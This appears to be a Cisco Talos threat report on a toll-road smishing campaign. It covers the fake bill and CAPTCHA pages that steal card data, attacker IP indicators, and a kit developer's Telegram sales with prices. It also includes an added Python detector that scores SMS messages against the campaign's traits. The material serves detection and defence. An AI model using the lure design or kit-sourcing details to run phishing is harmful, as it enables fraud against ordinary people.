The actors send an SMS notification for an outstanding bill claiming that the potential victim owes a small amount of money, under $5 USD. They warn of potential late fees, prompting victims to visit a spoofed domain for the payment.  

Sample phishing SMS messages. 

When the victim visits the domain, they are prompted to solve a fake image-based CAPTCHA, after which they are redirected to a fake webpage carrying the legitimate toll service’s logo. This webpage prompts the victim to enter their name and ZIP code to view their fake bill. The fake bill displays the victim’s name with a message stating that they owe approximately $4 and warning of a $35 late payment fee.


After the victim views their fake bill, they click the “Proceed Now” button, which redirects them to another fake webpage. This site prompts the victim to enter their name, address, phone number and credit card information, which the threat actor then steals. Due to limited visibility into the threat actor’s phishing infrastructure, Talos is unsure whether any further payloads are delivered to the victims’ devices.

In April 2024, the FBI’s Internet Crime Complaint Center (IC3) warned about a similar toll road smishing campaign in which the threat actor used the same brand impersonation technique but with slight differences in the SMS message language, monetary values and formatting.

Targeting toll road users in multiple states suggests the threat actor is likely leveraging user information publicly leaked from large databases. For example, the threat actor behind the 2024 National Public Data leak released billions of records publicly, which were then shared on private Telegram channels for further abuse. However, Talos currently does not have any evidence to suggest that the toll road smishing campaign is fueled by the National Public Data leaks.

Phishing infrastructure 

Talos observed that the actors have used several typosquatted domains in the SMS phishing messages to convince the potential victims to visit them. These typosquatted phishing domains were created during Oct. and Nov. 2024 and were observed resolving to one of the following IP addresses: 45[.]152[.]115[.]161 and 82[.]147[.]88[.]22.  

As of March 2025, Talos is still seeing new domains registered by the threat actors for the toll road scams, implying that the campaign is ongoing. During our research period, these newly registered domains resolved to the IP address 43[.]156[.]47[.]209. 
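As an added example (not code from the Talos post), the following Python scores an incoming SMS body against the campaign traits described above: a toll-brand keyword and a state abbreviation in the spoofed domain, a claimed balance under $5 paired with late-fee pressure, and the host resolving to one of the three IP addresses Talos lists. The sample messages and domains are constructed for the example; only the IP addresses come from the report.

```python
import re
from ipaddress import ip_address
from typing import Optional

# IPs quoted (defanged) in the Talos report; refanged here for comparison.
KNOWN_SMISHING_IPS = {d.replace("[.]", ".") for d in (
    "45[.]152[.]115[.]161", "82[.]147[.]88[.]22", "43[.]156[.]47[.]209")}
# Toll brands the campaign impersonates, per the report.
TOLL_KEYWORDS = ("ezpass", "e-zpass", "ezdrive", "ntta", "toll")
# States whose two-letter abbreviations Talos saw in the spoofed domains.
STATE_ABBRS = {"wa", "fl", "pa", "va", "tx", "oh", "il", "ks"}

URL_RE = re.compile(r"https?://([^/\s]+)[^\s]*", re.IGNORECASE)
AMOUNT_RE = re.compile(r"\$\s?(\d+(?:\.\d{1,2})?)")


def score_sms(text: str, resolved_ip: Optional[str] = None):
    """Return (score, reasons) for one SMS body; a score of 3 or more is alert-worthy."""
    reasons = []
    m = URL_RE.search(text)
    host = m.group(1).lower() if m else ""
    labels = re.split(r"[.-]", host)  # split on dots and hyphens to isolate "pa", "tx", ...
    if any(k in host for k in TOLL_KEYWORDS):
        reasons.append("toll brand keyword in URL host")
    if any(lbl in STATE_ABBRS for lbl in labels):
        reasons.append("US state abbreviation in URL host")
    amounts = [float(a) for a in AMOUNT_RE.findall(text)]
    if any(a < 5 for a in amounts):
        reasons.append("claimed balance under $5")
    if re.search(r"late\s+fee|penalt", text, re.IGNORECASE):
        reasons.append("late-fee pressure")
    if resolved_ip and str(ip_address(resolved_ip)) in KNOWN_SMISHING_IPS:
        reasons.append("host resolves to IP listed in the report")
    return len(reasons), reasons


# Constructed sample messages (text, IP the URL host resolved to); not real captures.
SAMPLE_SMS = [
    ("Toll Services: unpaid toll of $4.15. Pay by 03/12 to avoid a $35 late fee: "
     "https://ezdrive-pa.example/pay", "45.152.115.161"),
    ("Your package is ready for pickup at the front desk.", None),
]


def triage(messages):
    """True for each message that crosses the alert threshold."""
    return [score_sms(text, ip)[0] >= 3 for text, ip in messages]


if __name__ == "__main__":
    for (text, ip), flagged in zip(SAMPLE_SMS, triage(SAMPLE_SMS)):
        print(flagged, score_sms(text, ip)[1])
```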


Smishing kits likely used in the U.S. toll road scams 

Talos assesses with moderate confidence that multiple threat actors are operating the toll road smishing campaign by leveraging a smishing kit developed by the actor known as “Wang Duo Yu”, according to the intelligence obtained by Talos. 

We have observed similar smishing kits being used by the organized cybercrime group known as the “Smishing Triad.” This group has conducted large-scale smishing attacks targeting mail services in multiple countries, including the United States Postal Service (USPS), as well as the financial and commercial sectors, as previously reported by Resecurity.

Talos discovered references to specific phishing kits targeting toll systems in the DY Tongbu Telegram channel “老王同步源码开发教学” (translated as “Lao Wang Synchronized Source Code Development Tutorial”).

Public Lao Wang Synchronized Source Code Development Tutorial Telegram channel.

The Telegram channel shared details about a phishing module that allegedly spoofs the Massachusetts MassDOT’s EZDriveMA toll system, as well as a phishing module that targets customers of the North Texas Toll Authority. At the time of publication, the Telegram channel had more than 4,400 subscribers. 

Further investigation has revealed that the developer, 王多余 (translated to Wang Duo Yu), has developed a similar smishing kit and operates the Lao Wang Synchronized Source Code Development Tutorial Telegram channel from two separate accounts. The pictures shown below display screenshots of the two Telegram accounts related to Wang Duo Yu.

Two Telegram accounts related to Wang Duo Yu.

Additionally, we noticed that the developer has created a YouTube channel where they upload tutorial videos. These videos cover topics such as “How to Build a PMTA Mail Server,” “Setting Up an Automatic EPUSD Payment and Vending System,” “Creating a Pagoda Panel Website (宝塔面板),” “Building the Simplest and Safest Node Using Native Tools,” and “Using the X-UI Panel to Set Up a VMess+WS+TLS+Web or VLess+WS+TLS+Web Node.” Each video guides users on building basic web services or mail servers.

Wang Duo Yu’s YouTube channel. 

There are also some private video links that cannot be found elsewhere. Talos found one such video on a Chinese forum. To access the post with the video link, users need special permissions in that forum. 

Wang Duo Yu’s YouTube channel with private video. 

We also observed Wang Duo Yu promoting their smishing kit business and tutorials on other Telegram channels, and also offering personal lessons that include full-stack development, mail server setup and Telegram bot development. The threat actor offers a two-hour lesson each day and provides one-on-one instruction via remote desktop, charging ¥5888 (approximately US $806 at time of publication) per class.

Wang Duo Yu marketing the kits in Telegram channels.

One of the Telegram channels shown in the above picture is called “向前论坛,” translating to “Xiangqian Forum,” of which Wang Duo Yu is a moderator. Wang Duo Yu posted articles in this forum to increase subscribers, promoted their own teaching courses, and provided links and discount codes for purchasing VPS and domains.

Wang Duo Yu selling the VPS and cloud services through his website. 

We also found an additional website selling VPS and cloud services, confirmed to be owned by Wang Duo Yu. The “wangduoyu[.]vip” website was active from 2022 to 2023.

Wang Duo Yu’s shop website.

Wang Duo Yu’s shop DNS resolved IPs and active periods of time.

We observed that Wang Duo Yu offers the toll smishing kit source code for sale and provides services to assist in setting up the whole system. In a forum post, they stated that anyone interested can reach out to their personal Telegram account “@wangduofish”. The post also includes hidden content only visible to users with VIP access. 

Wang Duo Yu’s post includes hidden content only visible with VIP access. 

Wang Duo Yu has crafted and designed specific smishing kits and has been selling access to these kits on their Telegram channels. The kits are available with different infrastructure options, priced at US $50 each for a full-feature development, $30 each for proxy development (when the customer has a personal domain and server), $20 each for version updates, and $20 for all other miscellaneous support. The threat actor also offers updated releases for multiple source code versions. The offers on the Telegram channel revealed that the smishing kits and source code primarily target large public-facing entities with a large end-user base, such as toll road operators, banks and postal services.

Coverage


Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless, transparent and secure access to the internet, cloud services or private applications no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Indicators of Compromise  

IOCs for this threat can be found in our GitHub repository here.
